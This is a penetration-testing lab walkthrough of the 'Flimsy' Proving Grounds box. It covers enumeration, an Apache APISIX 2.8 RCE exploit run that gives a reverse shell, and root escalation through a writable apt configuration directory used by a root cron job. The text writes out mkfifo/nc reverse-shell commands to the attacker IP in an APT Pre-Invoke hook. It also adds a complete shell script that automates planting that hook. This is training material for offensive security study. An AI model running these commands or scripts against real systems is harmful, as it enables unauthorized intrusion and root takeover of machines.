Proving Grounds — Flimsy (Easy) Linux Box — Walkthrough
A Journey To Offensive Security

Brian
4 min read · Sep 16, 2024


Introduction:

In this post, we walk through an easy-level Linux box codenamed “Flimsy.” The box asks the tester to exploit a known remote code execution (RCE) vulnerability in Apache APISIX for initial access, and then to escalate to root through a weak service configuration: a root cron job that runs apt-get update while the apt configuration directory is writable. We cover the whole process, from initial enumeration to a root shell.

Information Gathering:

During initial enumeration, a full TCP port scan (first listing below) finds four open ports, and a follow-up service and version scan (second listing) identifies port 43500 as an OpenResty web application server.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-27 19:59 PDT
Nmap scan report for 192.168.210.220
Host is up (0.095s latency).
Not shown: 65378 filtered tcp ports (no-response), 152 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
43500/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 152.01 seconds


Nmap scan report for 192.168.219.220
Host is up (0.096s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Upright
3306/tcp open mysql MySQL (unauthorized)
43500/tcp open http OpenResty web app server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.32 seconds
  • A nikto scan of the OpenResty service on port 43500 shows the Server header APISIX/2.8, so Apache APISIX 2.8 is running behind OpenResty. A Server header is only what the service claims, but it is a good enough lead to search for known vulnerabilities in that version.
Nikto scan — APISIX/2.8
  • Checking whether Apache APISIX 2.8 is affected by known attacks, we find a public exploit for an RCE vulnerability in this version (the advisory is shown in the screenshot).
  • We git clone the exploit to our Kali machine.
  • We open a netcat listener on port 80 on our Kali machine.
  • We run the exploit, passing the target URL, our Kali IP address and the port the listener is bound to:
python3 apisix-exploit.py http://192.168.219.220:43500/ 192.168.45.178 80
apisix exploit
  • The reverse shell connects back to our listener and we have a low-privileged user session on the machine.
Reverse Shell
  • To upgrade the raw shell to an interactive TTY, we run:
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • We transfer linPEAS to the target and run it.
  • linPEAS reports a cron job that runs apt-get update as root.
Discovery of cronjob running apt-get update
  • Searching for “apt update cronjob privilege escalation” on Google yields instructions on how to escalate privileges.
APT Privilege Escalation Instructions
  • Following those instructions, we first confirm that the apt configuration directory below is writable by our user. apt reads every file in this directory each time it runs, so a writable directory here lets an unprivileged user inject configuration into root's apt-get update.

/etc/apt/apt.conf.d

  • We launch a netcat listener on port 4444 on a different terminal.
  • From inside /etc/apt/apt.conf.d we write a configuration fragment that registers an APT::Update::Pre-Invoke hook. Note that the command writes to a relative path, so it must be run from within that directory (or the full path /etc/apt/apt.conf.d/pwn used instead). The next time the cron job runs apt-get update as root, apt executes the hook through /bin/sh, and after a short wait we receive a root shell on our listener.
echo 'APT::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.178 4444 >/tmp/f"}' > pwn
Root shell
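The privilege escalation above can be scripted so that the two preconditions are checked before the hook is written. The following POSIX shell helper is an added example and is not part of the original walkthrough: it looks for a system cron entry that runs apt-get update, refuses to continue unless the apt configuration directory is actually writable, and writes the hook with an absolute path so it cannot land in the wrong directory. The listener host and port, the file name pwn, and the conventional `";};` terminator on the Pre-Invoke entry are assumptions; the payload is the same mkfifo/nc reverse shell used in the walkthrough.

```sh
#!/bin/sh
# Added example (not from the original walkthrough): helper for the apt
# Pre-Invoke escalation. Listener host/port and the file name "pwn" are
# assumptions supplied by the caller.

# Print system cron lines that run apt-get/apt update; exit status 1 if none.
# Only the standard system crontab locations are checked.
find_apt_update_cron() {
    cat /etc/crontab /etc/cron.d/* 2>/dev/null \
        | grep -v '^[[:space:]]*#' \
        | grep -E 'apt(-get)?[[:space:]]+update'
}

# Emit the apt.conf fragment. Every entry in APT::Update::Pre-Invoke is run by
# apt-get update through /bin/sh before any package index is fetched, as the
# invoking user (root when cron runs it). The payload is a mkfifo/nc shell.
build_hook() {
    lhost="$1"; lport="$2"
    printf 'APT::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f";};\n' \
        "$lhost" "$lport"
}

# Write the hook to CONFDIR/pwn, but only if CONFDIR is a directory we can
# write to. Returns 0 on success, 1 if the precondition does not hold.
drop_hook() {
    confdir="$1"; lhost="$2"; lport="$3"
    if [ ! -d "$confdir" ] || [ ! -w "$confdir" ]; then
        echo "$confdir is not a writable directory" >&2
        return 1
    fi
    build_hook "$lhost" "$lport" > "$confdir/pwn" || return 1
    echo "hook written to $confdir/pwn; wait for the cron job to run apt-get update"
}

# Typical use on the target, with `nc -lvnp 4444` already running on the
# attacker box (assumed addresses):
#   find_apt_update_cron && drop_hook /etc/apt/apt.conf.d 192.168.45.178 4444
```

The same check works in the other direction for hardening: if drop_hook succeeds for an unprivileged user against /etc/apt/apt.conf.d, the directory permissions are wrong and any root-run apt-get update is a privilege escalation path.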

Improved Skills

  • Learned the apt Pre-Invoke privilege escalation vector (root cron job running apt-get update plus a writable /etc/apt/apt.conf.d)

Conclusion

This walkthrough of the “Flimsy” box illustrates the importance of thorough enumeration and recognizing known vulnerabilities for gaining initial access. The box also emphasizes the value of post-exploitation tools like Linpeas for identifying privilege escalation vectors.

Please feel free to reach out to me!

https://twitter.com/SL0cLpS_1

I'm a cybersecurity enthusiast with a passion for ethical hacking and penetration testing. Currently, I'm studying for my OSCP.